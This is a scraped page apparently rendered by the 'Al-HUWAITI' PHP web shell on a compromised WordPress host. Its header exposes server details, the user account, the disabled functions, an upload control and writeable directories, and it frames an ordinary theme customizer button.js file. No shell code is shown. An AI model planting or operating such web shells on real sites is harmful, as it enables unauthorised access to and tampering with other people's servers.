hello 404 Not Found
Al-HUWAITI Shell
Al-huwaiti


Server : Apache
System : Linux webm006.cluster103.gra.hosting.ovh.net 6.18.39-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Tue Jul 21 12:03:15 CEST 2026 x86_64
User : chryzalihi ( 621211)
PHP Version : 8.3.31
Disable Function : _dyuweyrj4,_dyuweyrj4r,dl
Directory :  /home/chryzalihi/www/wp-content/themes/bloglo/inc/customizer/controls/button/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /home/chryzalihi/www/wp-content/themes/bloglo/inc/customizer/controls/button/button.js
(function ($) {
  wp.customize.controlConstructor["bloglo-button"] =
    wp.customize.Control.extend({
      ready: function () {
        "use strict";

        var control = this;

        control.container.on("click", ".button", function (e) {
          var $this = $(this),
            action = $this.data("ajax-action");

          // Check for ajax action.
          if (action) {
            e.preventDefault();

            $this.siblings(".spinner").addClass("activated");

            var data = {
              _ajax_nonce: bloglo_customizer_localized.wpnonce,
              action: action,
            };

            $.post(
              bloglo_customizer_localized.ajaxurl,
              data,
              function (response) {
                // Check response
                if (response.success) {
                  $this.siblings(".spinner").removeClass("activated");

                  // Should we reload the page?
                  if (
                    "undefined" !== typeof response.data.reload &&
                    response.data.reload
                  ) {
                    location.reload();
                  }
                }
              }
            );
          }
        });
      },
    });
})(jQuery);

Al-HUWAITI Shell